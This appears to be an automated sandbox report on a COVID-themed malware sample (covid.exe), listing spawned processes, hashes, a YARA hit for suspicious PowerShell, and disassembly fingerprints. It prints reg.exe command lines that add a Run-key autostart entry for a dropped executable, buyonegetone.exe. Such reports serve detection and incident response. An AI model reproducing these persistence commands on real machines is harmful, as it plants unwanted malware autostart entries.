                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000001.00000002.263748578.000001A410EF0000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: conhost.exe PID: 244 Parent PID: 5720

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:04:25
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: iexplore.exe PID: 4168 Parent PID: 5720

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:04:34
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/
                                                                                                                                                                    Imagebase:0x7ff6e4bd0000
                                                                                                                                                                    File size:823560 bytes
                                                                                                                                                                    MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: iexplore.exe PID: 5956 Parent PID: 4168

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:04:35
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4168 CREDAT:17410 /prefetch:2
                                                                                                                                                                    Imagebase:0xc70000
                                                                                                                                                                    File size:822536 bytes
                                                                                                                                                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: reg.exe PID: 6616 Parent PID: 5720

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:04:42
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
                                                                                                                                                                    Imagebase:0x7ff714f20000
                                                                                                                                                                    File size:72704 bytes
                                                                                                                                                                    MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: reg.exe PID: 6644 Parent PID: 5720

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:04:44
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
                                                                                                                                                                    Imagebase:0x7ff714f20000
                                                                                                                                                                    File size:72704 bytes
                                                                                                                                                                    MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: buyonegetone.exe PID: 6748 Parent PID: 5720

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:04:46
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\buyonegetone.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\buyonegetone.exe'
                                                                                                                                                                    Imagebase:0x7ff686040000
                                                                                                                                                                    File size:274944 bytes
                                                                                                                                                                    MD5 hash:3087BC614A52D038FC9F62DE3DD2C61F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: conhost.exe PID: 6828 Parent PID: 6748

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:04:47
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: mobsync.exe PID: 6888 Parent PID: 3388

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:04:48
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\mobsync.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\mobsync.exe
                                                                                                                                                                    Imagebase:0x7ff7a9780000
                                                                                                                                                                    File size:97792 bytes
                                                                                                                                                                    MD5 hash:99D4E13A3EAD4460C6E102E905E25A5C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: WerFault.exe PID: 7016 Parent PID: 6888

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:04:51
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 6888 -s 640
                                                                                                                                                                    Imagebase:0x7ff6f14c0000
                                                                                                                                                                    File size:494488 bytes
                                                                                                                                                                    MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: buyonegetone.exe PID: 7120 Parent PID: 3388

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:04:55
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\buyonegetone.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\buyonegetone.exe'
                                                                                                                                                                    Imagebase:0x7ff6fe100000
                                                                                                                                                                    File size:274944 bytes
                                                                                                                                                                    MD5 hash:3087BC614A52D038FC9F62DE3DD2C61F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: conhost.exe PID: 7148 Parent PID: 7120

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:04:56
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: mobsync.exe PID: 6224 Parent PID: 3388

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:04:57
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\mobsync.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\mobsync.exe
                                                                                                                                                                    Imagebase:0x7ff7a9780000
                                                                                                                                                                    File size:97792 bytes
                                                                                                                                                                    MD5 hash:99D4E13A3EAD4460C6E102E905E25A5C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: WerFault.exe PID: 4464 Parent PID: 6224

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:00
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 6224 -s 636
                                                                                                                                                                    Imagebase:0x7ff6f14c0000
                                                                                                                                                                    File size:494488 bytes
                                                                                                                                                                    MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: buyonegetone.exe PID: 4244 Parent PID: 3388

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:04
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\buyonegetone.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\buyonegetone.exe'
                                                                                                                                                                    Imagebase:0x7ff7e3d60000
                                                                                                                                                                    File size:274944 bytes
                                                                                                                                                                    MD5 hash:3087BC614A52D038FC9F62DE3DD2C61F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: conhost.exe PID: 1648 Parent PID: 4244

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:05
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: mobsync.exe PID: 5504 Parent PID: 3388

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:06
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\mobsync.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\mobsync.exe
                                                                                                                                                                    Imagebase:0x7ff7a9780000
                                                                                                                                                                    File size:97792 bytes
                                                                                                                                                                    MD5 hash:99D4E13A3EAD4460C6E102E905E25A5C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: WerFault.exe PID: 5108 Parent PID: 5504

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:11
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 5504 -s 404
                                                                                                                                                                    Imagebase:0x7ff6f14c0000
                                                                                                                                                                    File size:494488 bytes
                                                                                                                                                                    MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: buyonegetone.exe PID: 5172 Parent PID: 3388

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:13
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\buyonegetone.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\buyonegetone.exe'
                                                                                                                                                                    Imagebase:0x7ff7e3d60000
                                                                                                                                                                    File size:274944 bytes
                                                                                                                                                                    MD5 hash:3087BC614A52D038FC9F62DE3DD2C61F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: conhost.exe PID: 5132 Parent PID: 5172

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:13
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Analysis Process: mobsync.exe PID: 5240 Parent PID: 3388

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:14
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\mobsync.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\mobsync.exe
                                                                                                                                                                    Imagebase:0x7ff7a9780000
                                                                                                                                                                    File size:97792 bytes
                                                                                                                                                                    MD5 hash:99D4E13A3EAD4460C6E102E905E25A5C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Chronological Activities

                                                                                                                                                                    Disassembly

                                                                                                                                                                    Code Analysis

                                                                                                                                                                    Reset < >

                                                                                                                                                                      Analysis Process: covid.exe PID: 5760 Parent PID: 5552 covid.exeCOMMON

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FFAEEB308E9, Relevance: 1.7, APIs: 1, Instructions: 170COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.305575200.00007FFAEEB30000.00000040.00000001.sdmp, Offset: 00007FFAEEB30000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleCtrlHandler
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1513847179-0
                                                                                                                                                                      • Opcode ID: f84c216307c0bf0318741e895f3e811ce565ee310c326be527aedb6bf7638b7d
                                                                                                                                                                      • Instruction ID: 1b524badc6e207a29064a186a0bc86da428fb7d5e706792506c60f032411038c
                                                                                                                                                                      • Opcode Fuzzy Hash: f84c216307c0bf0318741e895f3e811ce565ee310c326be527aedb6bf7638b7d
                                                                                                                                                                      • Instruction Fuzzy Hash: 2351C43090D7884FD70AEB38D89ABE93FE1EF47311F0441AAE489C71A3CAA55845CB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEB30092, Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.305575200.00007FFAEEB30000.00000040.00000001.sdmp, Offset: 00007FFAEEB30000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleCtrlHandler
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1513847179-0
                                                                                                                                                                      • Opcode ID: 8f9a9986209e505b093c6006efadd26cdb6fb99c49bdd63896d7a0d2466a58b7
                                                                                                                                                                      • Instruction ID: 65bcc962fc9d64a8121c88f214f02c73b250865d032b0e7b525df89a166ca944
                                                                                                                                                                      • Opcode Fuzzy Hash: 8f9a9986209e505b093c6006efadd26cdb6fb99c49bdd63896d7a0d2466a58b7
                                                                                                                                                                      • Instruction Fuzzy Hash: DE319271A0CA1C8FDB58EF6DD8867BD77E0EF59311F00412EE44AD3292DAB4A8018B91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Analysis Process: powershell.exe PID: 5720 Parent PID: 5760 powershell.exeCOMMON

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FFAEEBE28D1, Relevance: 8.1, Strings: 6, Instructions: 642COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M$g*M$g*M$g*M$g*M$g*M
                                                                                                                                                                      • API String ID: 0-2999530285
                                                                                                                                                                      • Opcode ID: 669111e99d129046282d88c734d3ca2c69e38ee373e2cd5e3a51d59d04824393
                                                                                                                                                                      • Instruction ID: 5b5ee9b418682e80cb8efd65f187c0a2279971f81d913c453dd77aac7b62ecf5
                                                                                                                                                                      • Opcode Fuzzy Hash: 669111e99d129046282d88c734d3ca2c69e38ee373e2cd5e3a51d59d04824393
                                                                                                                                                                      • Instruction Fuzzy Hash: 5312177190CA4E4FE7A8DF29C8957747BE1EF99310B1581BEE04DC73A2CA649C45C742
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEBE6DE8, Relevance: 7.4, Strings: 5, Instructions: 1105COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: `7"$g*M$g*M$g*M$g*M
                                                                                                                                                                      • API String ID: 0-3326497758
                                                                                                                                                                      • Opcode ID: 6a7fe0b55077fefd73827241ad8e787e62329714c5280730cdc02160d28f9b98
                                                                                                                                                                      • Instruction ID: 54479c46da1fbabd9198289b3c30f961b7a71ebced6f36987d4e6a16fe1f5427
                                                                                                                                                                      • Opcode Fuzzy Hash: 6a7fe0b55077fefd73827241ad8e787e62329714c5280730cdc02160d28f9b98
                                                                                                                                                                      • Instruction Fuzzy Hash: 3D62693190DB9A0FE79AAB2998952B57FE1EF47310B0A81FBD44DC71E3D9589C05C382
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEBE06A7, Relevance: 5.8, Strings: 4, Instructions: 817COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M$g*M$g*M$g*M
                                                                                                                                                                      • API String ID: 0-1383785244
                                                                                                                                                                      • Opcode ID: 695f83df4512d37e75356786997bfa999ecd5c557fbe9f4e6f69ba4c75af54ec
                                                                                                                                                                      • Instruction ID: 66c6f1926074b4d3a8ac7ed23e50cc978a7f30e23ee8efe042ebc9cf16fcb7df
                                                                                                                                                                      • Opcode Fuzzy Hash: 695f83df4512d37e75356786997bfa999ecd5c557fbe9f4e6f69ba4c75af54ec
                                                                                                                                                                      • Instruction Fuzzy Hash: 1D321671E0DB8E0FE7A6AB6988A42757BE1EF57310B0981FBD04DC71E7D9589C058382
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEBE2A5E, Relevance: 4.1, Strings: 3, Instructions: 324COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M$g*M$g*M
                                                                                                                                                                      • API String ID: 0-2702511974
                                                                                                                                                                      • Opcode ID: dd041cf2b5882556d4af92f74d059c430b5895850e827f98f1010b08f80f4af9
                                                                                                                                                                      • Instruction ID: 5994afc3c81cd01a01aad0578f211ed08b58ee5fc0095a0e38fc12009cde226a
                                                                                                                                                                      • Opcode Fuzzy Hash: dd041cf2b5882556d4af92f74d059c430b5895850e827f98f1010b08f80f4af9
                                                                                                                                                                      • Instruction Fuzzy Hash: 40A1E47290CA4E4FE7A8DF19C89527477D2FF99310B5581BEE04DC73A2CE64AC468742
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEBE1F2E, Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M$g*M
                                                                                                                                                                      • API String ID: 0-158713885
                                                                                                                                                                      • Opcode ID: e9946061ce56aa60f57773b43e3ea6b6d72b8dd8fb68638d3a6902615d3f9e16
                                                                                                                                                                      • Instruction ID: c6fb03bb5b6b134b5c937e8fe19327d656d1811114828acd4404106dc7f36b0c
                                                                                                                                                                      • Opcode Fuzzy Hash: e9946061ce56aa60f57773b43e3ea6b6d72b8dd8fb68638d3a6902615d3f9e16
                                                                                                                                                                      • Instruction Fuzzy Hash: 7551D932A0DA5B0FE7A99B6998917B4B7D1EF46310B5981BAC08DC72E3DE54D80583C2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEBE1F7A, Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M$g*M
                                                                                                                                                                      • API String ID: 0-158713885
                                                                                                                                                                      • Opcode ID: f8bbde708c3d1d9c972b5bf54e161d07eb80ec61442a3a7fe95e3f9067da6e46
                                                                                                                                                                      • Instruction ID: 8d5f438bf134144db5ec3de7b8ae1f0b5b6ea2b389eaeee2420ea137c3d1274b
                                                                                                                                                                      • Opcode Fuzzy Hash: f8bbde708c3d1d9c972b5bf54e161d07eb80ec61442a3a7fe95e3f9067da6e46
                                                                                                                                                                      • Instruction Fuzzy Hash: 1731D832A0DA4F0FE7999B5998D5374B6C1EF46311B5AC1BAD08DC72E2DE58980542C3
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEB115D7, Relevance: 2.5, Strings: 1, Instructions: 1231COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (`_^
                                                                                                                                                                      • API String ID: 0-3185946245
                                                                                                                                                                      • Opcode ID: bad101bb82c6d13f175e192abe2c3461591195524662961131ffa24771466276
                                                                                                                                                                      • Instruction ID: 77d502b28c0277d364486d1d3e5d5f4c0f598250b8948201357da4dc8f7f0071
                                                                                                                                                                      • Opcode Fuzzy Hash: bad101bb82c6d13f175e192abe2c3461591195524662961131ffa24771466276
                                                                                                                                                                      • Instruction Fuzzy Hash: C4624876A0C68A4FDB45FB2DD4816E87FA0EF66331F194077D04CC7153DA64AC8A8792
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEBE7417, Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M
                                                                                                                                                                      • API String ID: 0-29437398
                                                                                                                                                                      • Opcode ID: c003682c4b2cd8333880de31c5a34280aa0d9eb9594f9ba6c2f2a5f7c7a00611
                                                                                                                                                                      • Instruction ID: 859449b8dc5a7c944b76827ad23ec3fd152b3a6780a692019163e0cc4843f291
                                                                                                                                                                      • Opcode Fuzzy Hash: c003682c4b2cd8333880de31c5a34280aa0d9eb9594f9ba6c2f2a5f7c7a00611
                                                                                                                                                                      • Instruction Fuzzy Hash: E911E972E1DF2E4AE3A8975EE4D13B97AD2DF85310745C1B5E84DC31B6ED489C010182
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEBE077C, Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M
                                                                                                                                                                      • API String ID: 0-29437398
                                                                                                                                                                      • Opcode ID: 99689e6d3b0a76135d5e3657e1fc578d5e590b9b64597d598d400d02686ed727
                                                                                                                                                                      • Instruction ID: f77f7b9ff9cd7165483f9ed49fe3181c79df1d28f7475c1b2297723beea3b8a2
                                                                                                                                                                      • Opcode Fuzzy Hash: 99689e6d3b0a76135d5e3657e1fc578d5e590b9b64597d598d400d02686ed727
                                                                                                                                                                      • Instruction Fuzzy Hash: EE113873D1DB9E0BF2A2A369A8A1274BAC1EF06710B4A81FAD14CC71DADC486C0406C3
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

